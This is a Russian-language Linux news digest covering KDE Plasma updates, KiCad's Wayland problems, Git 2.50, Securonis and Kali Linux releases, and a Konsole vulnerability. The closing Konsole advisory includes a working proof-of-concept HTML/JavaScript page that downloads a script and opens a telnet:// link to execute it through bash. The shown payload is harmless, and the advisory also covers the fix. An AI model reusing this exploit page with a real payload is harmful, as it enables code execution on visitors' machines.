• Реализовано затемнение фона рабочего стола и текущего окна во время вывода диалога аутентификации для более заметного акцентирования внимания на нём.
• В меню приложений Kickoff и виджете Application Launcher реализованы зелёные метки для выделения из общей массы недавно установленных программ. Метки исчезают через три дня после первого запуска нового приложения.
• В KRunner улучшена группировка результатов поиска - действия, связанные с сеансом и загрузкой, теперь включены в приоритетный список, выводимый в первую очередь. Улучшена навигация в KRunner с использованием клавиатуры. Обеспечена визуализация цвета - при вводе кодов представления цвета (например, #112233) или названий цветов, KRunner теперь показывает как выглядит цвет.
• Добавлено предупреждение, выводимое при попытке обращения к микрофону из приложения, если микрофон переведён в настройках в беззвучный режим.
• В композитном менеджере KWin реализована возможность включения расширенного динамического диапазона яркости для экранов, не поддерживающих HDR, на которых HDR имитируется при помощи изменения яркости подсветки.
• Улучшена поддержка Wayland. В композитном менеджере KWin задействована стабильная версия Wayland-протокола ext-data-control, необходимого для корректной работы с буфером обмена (ранее использовался протокол wlr-data-control-unstable-v1).
• Добавлена поддержка Wayland-протокола ext-idle-notify.
• Добавлена поддержка Wayland-протокола fifo, позволяющего использовать FIFO-механизм (первым пришёл - первым ушёл) обработки очереди обновления содержимого отображаемой поверхности. При помощи указанного протокола при выводе можно обойтись ожиданием завершения вертикальной развёртки (vblank) вместо использования callback-вызовов при каждой готовности отобразить новый кадр, что решает проблему с высокой нагрузкой на GPU при использовании VSync.
• Добавлена поддержка Wayland-протокола xdg-session-management. Изменение позволяет восстанавливать состояние окон прерванного сеанса в окружениях на основе протокола Wayland, например, в случае аварийного завершения композитного сервера или приложения.
• В окружении на базе Wayland добавлена возможность использования относительного позиционирования на графических планшетах, при котором позиция стилуса определяется относительно предыдущего положения, а не абсолютной позиции на поверхности планшета. Для работы с Wayland адаптирована возможность управления графическим курсором при помощи клавиатуры.
• Кодовая база kwin разделена на kwin_x11 и kwin_wayland.
• В KWin добавлена возможность настройки продолжительности действия эффекта затухания рабочего стола ("Fade Desktop").
• Добавлена поддержка HDR-видео в формате P010.
• Добавлена поддержка xdg-портала Clipboard, предоставляющего доступ к буферу обмена для приложений, запускаемых в изолированных окружениях, например, поставляемых в формате Flatpak.
• Реализована возможность переключения между окнами через сочетания клавиш Meta+Tab и Meta+Shift+Tab.
• Приложениям, использующим XWayland, предоставлена возможность управления клавиатурой и указателем мыши без вывода запросов подтверждение подобных операции. По умолчанию данная возможность отключена, так как она снижает уровень безопасности системы.
  
  
  
• В конфигураторе улучшен интерфейс страницы настройки дисплея. На системах с одним экраном обеспечено скрытие области выбора раскладки экранов. В многомониторных конфигураций улучшено выделение текущего экрана и представление подсоединённых, но не активированных экранов.
• В конфигуратор добавлен новый раздел "Анимация", в который перенесены настройки анимированных эффектов. В секции "Десктоп-эффекты" оставлены общие эффекты, не связанные с визуализацией перехода из одного состояния в другое.
• В диалоге настройки панели две отдельные кнопки в заголовке преобразованы в меню, что решило проблему с растяжением диалога на системах с локализацией из-за слишком длинных слов на кнопках.
• На странице управления пользователями реализовано предупреждение, показываемое при попытке удаления пользователя с активным сеансом. При подтверждении подобной операции файлы такого пользователя не будут удалены.
• В настройки системного лотка добавлено предупреждение, выводимое при попытке отключить сервис управления буфером обмена.
• Модернизировано оформление диалогов для настройки виджетов часов, словаря, таймера и показа слайд-шоу из выбранных изображений.
• Добавлена настройка для принудительного отключения пиктограмм определённых приложений в системном лотке. Новая возможность может оказаться полезной, когда приложения не содержат внутренних настроек для прекращения показа индикаторов (например, Discord).
• В диалоге настройки панели визуализация макетов размещения панели теперь отражает фактическое положение панели на экране.
• Переработано окно регистрации приложениями клавиатурных комбинаций.
• В диалог настройки действий при двойном клике мышью добавлена область для тестирования изменения перед его применением.
• В конфигураторе на странице с параметрами дисплея обеспечено отображение нецелых значений обновления экрана (например, 59.94Hz). Добавлена настройка для ограничения максимальной глубины цвета.
• Упрощена настройка кнопок стилуса. Добавлена возможность повторной калибровки графического планшета. Добавлен режим симуляции поведения мыши при использовании графического планшета.
  
  
  
• В системном лотке теперь показывается информация о ненастроенном виджете с прогнозом погоды.
• Улучшен виджет управления громкостью, в котором теперь показывается название контента, воспроизводимого в приложениях, выставляющих подобные метаданные (например, в браузерах). Добавлены текстовые заголовки для устройств ввода и вывода звука. Повышена наглядность при использовании нескольких устройств. Ускорен вызов окна управления буфером обмена комбинацией клавиш Meta+V.
• В виджет управления воспроизведением (Media Controller) добавлена поддержка комбинаций клавиш Ctrl+Tab и Alt+[number] для переключения между вкладками и источниками.
• В виджет с корзиной добавлен индикатор выполнения операции очистки (вращающийся спинер).
• В апплет, управляющий медиапроигрывателями, поддерживающими протокол MPRIS, добавлен переключатель скорости воспроизведения.
• В виджете управления встроенными и внешними дисками (Disks & Devices) реализована проверка состояния разделов и вывод кнопки для устранения выявленных ошибок.
• Оптимизирована эвристика центровки всплывающих окон виджетов, относительно экрана или панели.
• Повышена точность определения и показа виджетом Power & Battery информации о состоянии аккумуляторов Bluetooth-устройств.
• Реализован виджет для калибровки HDR.
• На экране блокировки системы добавлена возможность настройки таймаута показа приглашения входа. В многомониторных конфигурациях часы и интерактивные элементы интерфейса на экранах блокировки и входа в систему теперь показываются только на одном активном экране и скрываются на остальных экранах, не имеющих фокуса ввода.
  
  
  
• Переработано оформление страницы с информацией о системе и редактора меню KMenuEdit, позволяющего изменять содержимое и перегруппировывать элементы в меню приложений. В KMenuEdit добавлена возможность настройки постоянного запуска выбранных приложений на дискретном GPU.
• Изменена обработка уведомлений во время открытия приложений в полноэкранном режиме. Вместо игнорирования некритичных уведомлений при работе с полноэкранными программами теперь автоматически включается режим "не беспокоить". Отличия в том, что после выхода из полноэкранного режима будет показано предупреждение о наличии пропущенных уведомлений. При желании новое поведение можно отключить в настройках.
• Реализован график для наглядной оценки изменения скорости копирования файлов. График доступен на странице "Детали", на которую можно перейти из уведомления о копировании файла.
• Обеспечено сохранение интерактивных кнопок в уведомлениях, показываемых во всплывающем окне с историей уведомлений.
• Для уведомлений реализована поддержка выбора типа звукового оповещения (например, при получении письма может воспроизводиться отдельный звук, характерный для прихода сообщения).
• Предоставлена возможность запуска менеджера приложений Discover прямо из уведомлений о появлении обновлений.
• Вывод уведомлений о недостаточном свободном дисковом пространстве реализован почти для всех разделов (за исключением разделов в режиме только для чтения и разделов переполненных до монтирования), а не только для / и /home. Добавлена возможность настройки процента наполнения, при достижении которого начнёт выдаваться предупреждение.
• При перемещении мышью файла на рабочий стол или в файловый менеджер, если файл перемещается в рамках одного диска, то по умолчанию файл теперь перемещается в новое место без вывода запроса выбора операции с файлом.
• В приложении System Monitor модернизировано оформление обзорного режима и истории измерений. Добавлены индикатор нагрузки на GPU и диаграммы наличия свободного места на отдельных дисках. Для GPU Intel и AMD добавлена возможность отслеживания нагрузки в привязке к отдельным приложениям. Добавлена группа "Фоновые сервисы" для оценки потребления ресурсов системными компонентами. Добавлена отдельная страница с состоянием датчиков, на которой, например, можно посмотреть текущую температуру GPU и CPU.
• В инструментарий для интеграции с браузерами, позволяющий управлять воспроизведением мультимедиа в браузерах с рабочего стола, добавлена поддержка flatpak-пакетов с альтернативными браузерами на движках Chromium и Firefox, такими как LibreWolf и Ungoogled Chromium.
• Повышена производительность при использовании режима ночной подсветки и при изменения яркости (в данных режимах наблюдалось снижение частоты кадров при отображении видео).

Разработчики САПР KiCad раскритиковали Wayland и рекомендовали использовать X11

Тем кто намерен использовать KiCad в окружениях с Wayland следует быть готовым к возможным зависаниям и аварийным завершениям, невозможности восстановить желаемую раскладку окон и ограничению функциональности интерфейса. Утверждается, что ограничения в функциональности вызваны отсутствием в Wayland возможностей, давно применяемых в приложениях для X11, Windows и macOS, таких как поддержка позиционирования окон и мгновенного перемещения указателя мыши (cursor warp).

Что касается возникающих сбоев, то они связываются с большой фрагментацией композитных серверов для Wayland. GNOME, KDE и обособленные композитные менеджеры по своему интерпретируют протоколы Wayland, поэтому полагаться при разработке на единую целостную реализацию протоколов Wayland и экспериментальные расширения проблематично. Разработчикам приложений приходится учитывать особенности каждого окружения и применять костыли для обхода проблем, специфичных для разных композитных менеджеров.

Фрагментация композитных серверов существенно увеличивает трудозатраты на реализацию поддержки Wayland. Отмечается, что самое неприятное в том, что разработчики KiCad не имеют возможности исправить возникающие проблемы своими силами, так как проблемы присутствуют не в KiСad, а в протоколах, оконных менеджерах и композитных серверах.

Учитывая, что Linux применяет лишь небольшая часть пользователей KiCad, решено избегать добавления в кодовую базу проекта костылей для обхода проблем, специфичных для оконных менеджеров, но при этом продолжать собирать KiCad для Wayland и тестировать сборки на совместимость. Все выявляемые проблемы и ограничения планируют документировать и доводить до сведения пользователей.

В системе отслеживания ошибок решено не разбирать жалобы от пользователей Wayland, связанные с позиционированием и размером окон, установкой фокуса, а также зависаниями, аварийными завершениями, повышенной нагрузке на CPU, проблемами с устройствами ввода и сбоями при отрисовке, не проявляющимися в сборке для X11.

Среди известных проблем, которые находятся вне зоны влияния разработчиков KiCad и которые не удаётся устранить на стороне KiCad:

• Проблемы с управлением окнами: Невозможность управления позицией окон и панелей (при открытии KiCad нельзя запомнить и восстановить положение окон и панелей инструментов). Проблемы с координацией работы одновременно с несколькими окнами. Ограничение возможности перемещения вкладок и панелей между разными областями.
• Проблемы с устройствами ввода: Возможность мгновенного перемещения курсора (cursor warping) завязана на необязательные экспериментальные расширения протокола, поддерживаемые лишь в отдельных композитных менеджерах. Непредсказуемое поведение при управлении фокусом ввода. Проблемы при использовании специализированных устройств ввода и при обработке горячих клавиш.
• Проблемы со стабильностью и производительностью: Повышенное потребление ресурсов и высокая нагрузка на CPU/GPU по сравнению с использованием X11. Появление графических артефактов при отрисовке и нарушение нормального вывода. Зависания и аварийные завершения, проявляющиеся только при работе в окружениях на базе Wayland. Ненадёжная работа с буфером обмена.
• Ограничения интерфейса пользователя: Проблемы с позиционированием, фокусом и взаимодействием в модальных диалогах. Проблемы с запуском внешних приложений и управления ими.

Дополнительно можно отметить прогресс в разработке проекта X11Libre, развивающего форк X.Org Server. За 10 дней с момента основания форка к разработке подключилось 11 участников, которые отправили 31 изменение. Энрико Вайгельт, автор форка, в свою очередь перенёс в форк 1267 своих изменений, не принятых в основной состав X.Org. Тем временем, разработчики X.Org откатили из кодовой базы X.Org Server 6 изменений, ранее принятых от Энрико Вайгельта и приводящих к регрессиям или связанных с пометкой некоторых возможностей устаревшими (всего до создания форка от Энрико в X.Org Server было принято 1568 изменений).

Кевин Кофлер (Kevin Kofler) из проекта Fedora, входящий в рабочую группу, занимающуюся сопровождением пакетов с KDE, предложил заменить в Fedora Linux пакет xorg-x11-xserver на реализацию X-сервера от форка XLibre. В качестве мотива замены упомянут переход на активно сопровождаемую кодовую базу вместо продолжения поставки устаревшего и почти не обновляемого проекта X.Org, который по заявлению его разработчиков почти остался без сопровождения. Автор форка был наиболее активным участником проекта X.Org Server и поставка форка будет выгодна создателям редакций Fedora, остающихся на X11, например, из-за добавления в X11Libre X11-расширения Xnamespace, обеспечивающего изоляцию клиентов на уровне пространств имён X11. Предложение пока не утверждено комитетом FESCo (Fedora Engineering Steering Committee), отвечающим за техническую часть разработки дистрибутива Fedora.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63419

Arch Linux перешёл на 64-разрядные сборки Wine (WoW64)

В качестве причины изменения упоминается синхронизация с изменениями в основном проекте Wine, связанными с упрощением создания пакетов и сокращением цепочки зависимостей. Среди проблем, которые могут возникнуть после миграции на Wow64, упоминается снижение производительности OpenGL для 32-разрядных программ Windows и необходимость пересоздания существующих 32-разрядных префиксов Wine.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63418

Выпуск системы управления исходными текстами Git 2.50

По сравнению с прошлым выпуском в новую версию принято 621 изменение, подготовленное при участии 98 разработчиков, из которых 35 впервые участвуют в разработке. Основные новшества:

• Расширена возможность разделения на несколько pack-файлов базы недостижимых объектов ("cruft packs"), на которые в репозитории отсутствуют ссылки (не ссылаются ветки или теги). Использование нескольких мелких pack-файлов вместо одного крупного позволяет значительно сократить операции ввода/вывода при переупаковке репозиториев с большим числом недостижимых объектов, так как для каждой операции переупаковки не нужно перезаписывать все данные.

  В новой версии предложена опция "--combine-cruft-below-size", при помощи которой можно организовать объединение существующих pack-файлов, размер которых не превышает заданное значение. В отличие от ранее доступной опции "--max-cruft-size" новая опция "--combine-cruft-below-size" не ограничивает максимальный размер результирующего pack-файла, что позволяет более эффективно объединять pack-файлы в репозиториях с большим числом недостижимых объектов, разнесённых по нескольким pack-файлам.

• Добавлена экспериментальная поддержка инкрементального обновления многопакетных индексов MIDX (multi-pack index), при котором каждый слой MIDX-индекса c информацией о доступности объектов размещается в отдельном bitmap-файле. В очень крупных репозиториях реализованный вид индексов даёт возможность по мере поступления коммитов быстро и эффективно добавлять новые битовые карты доступности объектов.
• Из кодовой базы удалён старый движок выполнения операций слияния "recursive", на смену которому пришёл полностью переработанный движок "ORT" (Ostensibly Recursive’s Twin), более производительный, функциональный и удобный для сопровождения. ORT позволяет определить возможность объединения двух объектов, не создавая новых объектов в репозитории (при старом движке требовалось выполнение команды "git merge-tree --write-tree", записывающей новые объекты в репозиторий). В Git 2.50 в команде merge-tree реализована опция "--quiet", при которой возможность объединения можно проверить на основе кода возврата без записи данных в репозиторий.
• В "git cat-file --batch" и подобные команды добавлена опция "--filter", позволяющая пропустить некоторые объекты при выполнении операции.

     git cat-file --batch-check='%(objectname)' --filter='object:type=tree' 
  

• В команде "git maintenance" реализованы три новых действия: worktree-prune, rerere-gc и reflog-expire. Действие worktree-prune предназначено для удаления устаревших или повреждённых рабочих деревьев (worktrees) в репозитории. Действие rerere-gc удаляет старых записи, оставшиеся после устранения конфликтов слияния. Действие reflog-expire удаляет устаревшие недоступные объекты из reflog.
• Добавлена команда "git reflog drop", удаляющая все данные reflog для указанной ветки.
• Проведена оптимизация обработки и использования ссылок, например, реализовано кэширование префиксов ссылок, убраны лишние проверки при выполнении команды "git update-ref", повышена эффективность поиска существующих итераторов ссылок.
• Для библиотеки cURL добавлены настройки KeepAlive: http.keepAliveIdle, http.keepAliveInterval и http.keepAliveCount.
• В команде "git rev-list" реализована возможность вывода в формате, удобном для машинного разбора, при котором каждое поле разделено символом NUL.
• Язык Perl исключён из зависимостей, необходимых для утилит работы с документацией и выполнения тестового набора ("make test"). Многие Perl-однострочники в тестах заменены на функции shell или переписаны на языке Си.
• Добавлен userdiff-обработчик для формата файлов конфигурации ".ini".
• В команде send-email улучшена поддержка SMTP-сервера Outlook.

Опубликован защищённый дистрибутив Securonis Linux 3.0

Развиваемые проектом специфичные утилиты:

• Seconionis - прозрачный прокси для перенаправления трафика через Tor.
• I2P Router Menu - GUI для управления I2P Router.
• PxrtalCrypt - приложение для шифрования файлов.
• Securonis Notes - приложение для ведения зашифрованных заметок.
• Password Manager - менеджер паролей.
• Quick-USBKit - утилита для подключения, настройки и проверки USB-устройств.
• Open Mammoth - инструментарий для сетевой защиты.
• Wizard - утилита для очистки логов и заметания следов.
• VesperaCrypt - утилита для шифрования файлов.
• System Knight - сканирование системы на наличие следов руткитов и вредоносного ПО.
• System Manager - подборка возможностей для упрощения управления системой.
• FireScorpion Browser - сборка Firefox с усиленной защитой, вырезанием рекламы и блокированием отслеживания перемещений.
• Nevermore - утилита для безопасной очистки диска.
• Metadata Cleaner - утилита для удаления метаданных из файлов.
• ColdBootDef - утилита для очистки памяти перед завершением работы.
• SecDNSChanger - утилита для быстрой смены параметров в DNS.
• Securonis DNSCrypt - скрипт для упрощения использования DNSCrypt-Proxy.
• Paranoia - обеспечение полной изоляции системы и блокировки любой сетевой активности.
• PhysicalSec - инструментарий для защиты системы от совершения физических и аппаратных атак.
• Nuke2System - утилита для экстренной необратимой очистки всего содержимого.
• Securonis Data Destroyer - утилита для безопасного удаления файлов.

В новой версии:

• Прекращена поставка рабочего стола GNOME (оставлен только MATE). Удалены утилиты Symonitoring, Netraffic и Netxtrack.
• Режим паники разделён на три отдельные утилиты: Data Destroyer, Nuke2System и ColdBootDef.
• В состав включены собственные компоненты: PhysicalSec, FireScorpion Browser, System Knight и Password Manager.
• Переделан инструментарий для изоляции системы Paranoia.
• Предложены новые режимы "Performance" и "Extreme hardening", включающие настройки ядра для достижения максимальной производительности и безопасности.
• В состав включена утилита Speedtest для анализа пропускной способности сети.
• Обновлён интерфейс для настройки I2P.
• Ядро Linux обновлено до версии 6.12.30.

Выпуск дистрибутива для исследователей безопасности Kali Linux 2025.2

Kali предлагает подборку инструментов для специалистов в области компьютерной безопасности, включающую от средств для тестирования web-приложений и проникновения в беспроводные сети до программ для считывания данных с идентификационных RFID чипов. В комплект входит коллекция эксплоитов и около 400 специализированных утилит для проверки безопасности, таких как Aircrack, Maltego, SAINT, Kismet, Bluebugger, Btcrack, Btscanner, Nmap, p0f. Помимо этого, в дистрибутив входят средства для подбора паролей (Multihash CUDA Brute Forcer) и WPA ключей (Pyrit), использующие GPU NVIDIA и AMD для ускорения.

В новом выпуске:

• Полностью переделано меню приложений, структура которого приближена к классификатору базы знаний MITRE ATT&CK.
• Среда рабочего стола GNOME обновлена до версии 48.
• В сеанс GNOME добавлен индикатор, показывающий IP-адрес текущего VPN-соединения, который ранее поставлялся в сеансе на базе Xfce.
• Среда рабочего стола KDE обновлена до версии Plasma 6.3.
• Осуществлён переход с инструментария BloodHound Legacy, не обновлявшегося с 2023 года, на BloodHound Community Edition, применяемого для построения карты связей в сетях на базе контроллера домена Active Directory или Azure.

  В состав включены утилиты:

  • azurehound - коллектор данных в окружении Microsoft Azure для визуализации при помощи пакета BloodHound.
  • binwalk3 - инструментарий для анализа прошивок.
  • bloodhound-ce-python - коллектор на языке Python для BloodHound.
  • bopscrk - генератор словарей для подбора паролей.
  • chisel-common-binaries - готовые бинарный сборки chisel.
  • crlfuzz - утилита для проверки на уязвимости, связанные с подстановкой символов перевода строки или возврата каретки в HTTP-заголовки и параметры запроса.
  • donut-shellcode - генерация универсального shell-кода из содержимого в памяти.
  • gitxray - сбор данных о репозиториях в GitHub и участниках их разработки.
  • ldeep - утилита для перебора содержимого через LDAP.
  • ligolo-ng-common-binaries - готовые бинарный сборки ligolo-ng.
  • rubeus - утилита для низкоуровневой работы с Kerberos.
  • sharphound - коллектор данных для BloodHound CE.
  • tinja - утилита для тестирования web-страниц на возможность подстановки шаблонов.
• В состав всех графических сеансов добавлена утилита Xclip, позволяющая быстро поместить данные в буфер обмена из терминала.
• Обновлено окружение для мобильных устройств на базе платформы Android - NetHunter, с подборкой инструментов для тестирования систем на наличие уязвимостей. При помощи NetHunter возможна проверка осуществления атак, специфичных для мобильных устройств, например, через эмуляцию работы USB-устройств (BadUSB и HID Keyboard - эмуляция сетевого USB-адаптера, который может использоваться для MITM-атак, или USB-клавиатуры, выполняющей подстановку символов) и создание подставных точек доступа (MANA Evil Access Point). NetHunter устанавливается в штатное окружение платформы Android в форме chroot-образа, в котором выполняется специально адаптированный вариант Kali Linux.

  В новой версии реализована возможность проведения атак на Wi-Fi, подстановки кадров и захвата параметров согласования соединения WPA2, используя умные часы на базе чипов bcm43436b0, такие как TicWatch Pro 3. Обновлён инструментарий CARsenal (ранее CAN Arsenal) для осуществления атаки на автомобильные информационные системы. Обновлены варианты ядра для смартфонов Xiaomi Redmi 4/4X (A13), Xiaomi Redmi Note 11 (A15), Realme C15 (A10), Samsung Galaxy S10 (A14,A15/exynos9820) и Samsung Galaxy S9.

• Унифицированы и переведены на ядро Linux 6.12 сборки для Raspberry Pi.

Уязвимость в KDE Konsole, позволяющая выполнить код при открытии страницы в браузере

Для Konsole по умолчанию в KDE регистрируется сервис KTelnetService (ktelnetservice6.desktop), подключающий обработчики открываемых в бразузере URL-схем telnet://, rlogin:// и ssh://. При обработке данных схем в эмуляторе терминала запускаются утилиты telnet, rlogin и ssh, которым передаётся указанный в ссылке путь.

Уязвимость вызвана тем, что в случае, когда в системе не установлена утилита telnet, rlogin или ssh, Konsole при вызове соответствующего обработчика URL запускал командный интерпретатор bash. Например, если отсутствует telnet при открытии в браузере ссылки "telnet:///proc/self/cwd/Downloads/evil" в Konsole запускался "/bin/bash /proc/self/cwd/Downloads/evil". По аналогии можно совершить атаку на обработчики rlogin:// и ssh:// при отсутствии в системе утилит rlogin и ssh.

Эксплуатации уязвимостей сопутствует то, что в конфигурации по умолчанию современные версии Firefox и Chrome автоматически сохраняют инициированные для загрузки файлы, не вывода запрос пользователю, а лишь показывая уведомление о факте состоявшейся загрузки. В Firefox подобное поведение можно отключить выставив настройку "Always ask you where to save files" на странице конфигуратора "General › Files and Applications". Как правило, файлы сохраняются в каталог ~/Downloads, на который не зная имени текущего пользователя можно сослаться через файловый путь "/proc/self/cwd/Downloads/".

Ниже показан пример JavaScript-кода, при выполнении которого в браузере в окружениях KDE с Konsole у пользователя будут выполнены команды "echo "Hello world"; touch /tmp/foobar" (в примере они закодированы в строке "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg=="). Предложенный код формирует ссылку с интегрированными данными, симулирует клик на эту ссылку и перебрасывает пользователя на URL "telnet://...". Для работы в Chrome следует изменить имя файла в ссылке на evil.txt, так как Chrome автоматически добавляет расширение txt.

    ‹html›
    ‹head›
        ‹script type="text/javascript"›

        function downloadAndRedirect() {
            const anchor = document.createElement('a');
            anchor.href = "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg==";
            anchor.download = 'evil';
            document.body.appendChild(anchor);
            anchor.click();
            document.body.removeChild(anchor);

            setTimeout(() =› {
                window.location.href = "telnet:///proc/self/cwd/Downloads/evil";
            }, 1000);
        }
        ‹/script›
    ‹/head›
    ‹body onload="downloadAndRedirect()"›
    ‹/body›
    ‹/html›

В Firefox при попытке перехода по ссылке "telnet://" по умолчанию будет выведен запрос для подтверждения операции у пользователя. В случае согласия KTelnetService запустит команду:

    /usr/bin/konsole --noclose -e telnet /proc/self/cwd/Downloads/evil

Если в системе нет утилиты telnet, Konsole откатится на запуск bash вместо telnet, передав изначально указанный в командной строке аргумент.

Проблема устранена в выпуске Konsole 25.04.2, вошедшем в состав обновления KDE Gear 25.04.2. Проследить за устранением уязвимости в дистрибутивах можно на следующих страницах: Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Arch, FreeBSD. В качестве обходных путей для блокирования уязвимости можно установить утилиты telnet, rlogin и ssh или удалить файл /usr/share/applications/ktelnetservice6.desktop.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63410